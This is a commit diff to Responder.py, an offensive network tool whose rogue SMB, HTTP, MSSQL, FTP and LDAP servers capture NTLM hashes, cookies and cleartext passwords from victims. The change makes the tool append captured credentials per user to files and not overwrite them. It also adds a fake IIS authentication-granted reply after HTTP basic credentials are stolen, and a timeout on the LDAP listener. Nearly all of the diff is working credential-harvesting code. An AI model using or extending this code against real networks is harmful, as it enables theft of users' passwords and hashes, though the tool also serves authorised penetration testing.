Responder now insert multiple usernames/hashes in a file for the same hostname.

2025-08-14 02:27:12 -07:00 · 2013-02-28 12:04:53 -05:00 · 2013-02-28 12:04:53 -05:00 · 69c08995e5
commit 69c08995e5
parent 690250d451
1 changed files with 35 additions and 21 deletions
--- a/Responder.py
+++ b/Responder.py
@ -20,7 +20,7 @@ import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os
 from Fingerprint import RunSmbFinger,OsNameClientVersion
 from odict import OrderedDict
 from socket import inet_aton
-from random import randrange
+from random import randrange, choice

 parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b 1 -s On -r 0',
                               prog=sys.argv[0],
@ -91,11 +91,22 @@ def Show_Help(ExtraHelpData):
   print help

 #Function used to write captured hashs to a file.
-def WriteData(outfile,data):
-    with open(outfile,"w") as outf:
-         outf.write(data)
-	 outf.write("\n")
-         outf.close()
+def WriteData(outfile,data, user):
+    if os.path.isfile(outfile) == False:
+       with open(outfile,"w") as outf:
+          outf.write(data)
+          outf.write("\n")
+          outf.close()
+    if os.path.isfile(outfile) == True:
+       with open(outfile,"r") as filestr:
+          if re.search(user, filestr.read()):
+             filestr.close()
+             return None
+          else:
+             with open(outfile,"a") as outf2:
+                outf2.write(data)
+                outf2.write("\n")
+                outf2.close()

 # Break out challenge for the hexidecimally challenged.  Also, avoid 2 different challenges by accident.
 Challenge = ""
@ -330,7 +341,7 @@ def ParseSMBHash(data,client):
       User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
       print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
       writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
-       WriteData(outfile,writehash)
+       WriteData(outfile,writehash,User+"::"+Domain)
       print "[+]SMB complete hash is :", writehash
       logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))

@ -347,7 +358,7 @@ def ParseSMBHash(data,client):
       User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
       print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
       writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:]
-       WriteData(outfile,writehash)
+       WriteData(outfile,writehash,User+"::"+Domain)
       print "[+]SMB complete hash is :", writehash
       logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(writehash))

@ -367,7 +378,7 @@ def ParseLMNTHash(data,client):
       var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
       Username, Domain = tuple(var)
       Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper()
-       WriteData(outfile,Writehash)
+       WriteData(outfile,Writehash, Username+"::"+Domain)
       print "[+]SMB-NTLMv2 complete hash is :",Writehash
       logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash))
       print "Username : ",Username
@ -382,7 +393,7 @@ def ParseLMNTHash(data,client):
       var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
       Username, Domain = tuple(var)
       writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal
-       WriteData(outfile,writehash)
+       WriteData(outfile,writehash, Username+"::"+Domain)
       print "[+]SMB complete hash is :", writehash
       logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
       print "Username : ",Username
@ -589,7 +600,7 @@ def ParseSQLHash(data,client):
       print "User is :", SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
       logging.warning('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
       outfile = "MSSQL-NTLMv1-Client-"+client+".txt"
-       WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)
+       WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain)
       print '[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)
       logging.warning('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal))
    if NthashLen > 60:
@ -610,7 +621,7 @@ def ParseSQLHash(data,client):
       logging.warning('[+]MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
       outfile = "MSSQL-NTLMv2-Client-"+client+".txt"
       Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper()
-       WriteData(outfile,Writehash)
+       WriteData(outfile,Writehash,User+"::"+Domain)
       print "[+]MSSQL NTLMv2 Complete Hash is : ", Writehash
       logging.warning('[+]MSSQL NTLMv2 Complete Hash is : %s'%(Writehash))

@ -810,7 +821,7 @@ def ParseHTTPHash(data,client):
       logging.warning('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
       outfile = "HTTP-NTLMv1-Client-"+client+".txt"
       WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
-       WriteData(outfile,WriteHash)
+       WriteData(outfile,WriteHash, User+"::"+Hostname)
       print "Complete hash is : ", WriteHash
       logging.warning('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash))
    if NthashLen > 24:
@ -834,7 +845,7 @@ def ParseHTTPHash(data,client):
       logging.warning('[+]HTTP NTLMv2 Hostname is :%s'%(HostName))
       outfile = "HTTP-NTLMv2-Client-"+client+".txt"
       WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
-       WriteData(outfile,WriteHash)
+       WriteData(outfile,WriteHash, User+"::"+Domain)
       print "Complete hash is : ", WriteHash
       logging.warning('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash))

@ -898,9 +909,11 @@ def PacketSequence(data,client):
    if b:
       GrabCookie(data,client)
       outfile = "HTTP-Clear-Text-Password-"+client+".txt"
-       WriteData(outfile,b64decode(''.join(b)))
+       WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
       print "[+]HTTP-User & Password:", b64decode(''.join(b))
       logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(b))))
+       buffer1 = str(IIS_Auth_Granted())
+       return buffer1

    else:
       return str(Basic_Ntlm(Basic))
@ -978,10 +991,10 @@ def ParseDomain(data,client):
    DomainName = re.search('^(.*:)//([a-z\-.]+)(:[0-9]+)?(.*)$', Host)
    if DomainName:
       OutFile = "HTTPCookies/HTTP-Cookie-"+DomainName.group(2)+"-"+client+".txt"
-       WriteData(OutFile,Message)
+       WriteData(OutFile,Message, Message)
    else:
       OutFile = "HTTPCookies/HTTP-Cookie-"+Host.replace('/','')+"-"+client+".txt"
-       WriteData(OutFile,Message)
+       WriteData(OutFile,Message, Message)

 #Handle HTTP packet sequence.
 def ProxyPacketSequence(data,client):
@ -1004,7 +1017,7 @@ def ProxyPacketSequence(data,client):
          return str(buffer1)
    if b:
       outfile = "HTTP-Proxy-Clear-Text-Password-"+client+".txt"
-       WriteData(outfile,b64decode(''.join(b)))
+       WriteData(outfile,b64decode(''.join(b)),b64decode(''.join(b)))
       print "[+][Proxy]HTTP-User & Password:", b64decode(''.join(b))
       logging.warning('[+][Proxy]HTTP-User & Password: %s'%(b64decode(''.join(b))))
       buffer1 = DitchThisConnection()
@ -1066,7 +1079,7 @@ class FTP(SocketServer.BaseRequestHandler):
          if data[0:4] == "PASS":
             Pass = data[5:].replace("\r\n","")
             Outfile = "FTP-Clear-Text-Password-"+self.client_address[0]+".txt"
-             WriteData(Outfile,User+":"+Pass)
+             WriteData(Outfile,User+":"+Pass, User+":"+Pass)
             print "[+]FTP Password is: ", Pass
             logging.warning('[+]FTP Password is: %s'%(Pass))
             t = FTPPacket(Code="530",Message="User not logged in.")
@ -1112,7 +1125,7 @@ def ParseLDAPHash(data,client):
       User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','')
       writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
       Outfile = "LDAP-NTLMv1-"+client+".txt"
-       WriteData(Outfile,writehash)
+       WriteData(Outfile,writehash,User+"::"+Domain)
       print "[LDAP] NTLMv1 complete hash is :", writehash
       logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
    if LMhashLen <2 :
@ -1147,7 +1160,7 @@ def ParseLDAPPacket(data,client):
             Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
             print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password
             outfile = "LDAP-Clear-Text-Password-"+client+".txt"
-             WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password))
+             WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password))
             logging.warning('[LDAP]User: %s Password: %s'%(UserDomain,Password))
          if sasl == "\xA3":
             buff = ParseNTLM(data,client)
@ -1169,6 +1182,7 @@ class LDAP(SocketServer.BaseRequestHandler):
    def handle(self):
        try:
           while True:
+              self.request.settimeout(0.5)
              data = self.request.recv(8092)
              buffer0 = ParseLDAPPacket(data,self.client_address[0])
              if buffer0: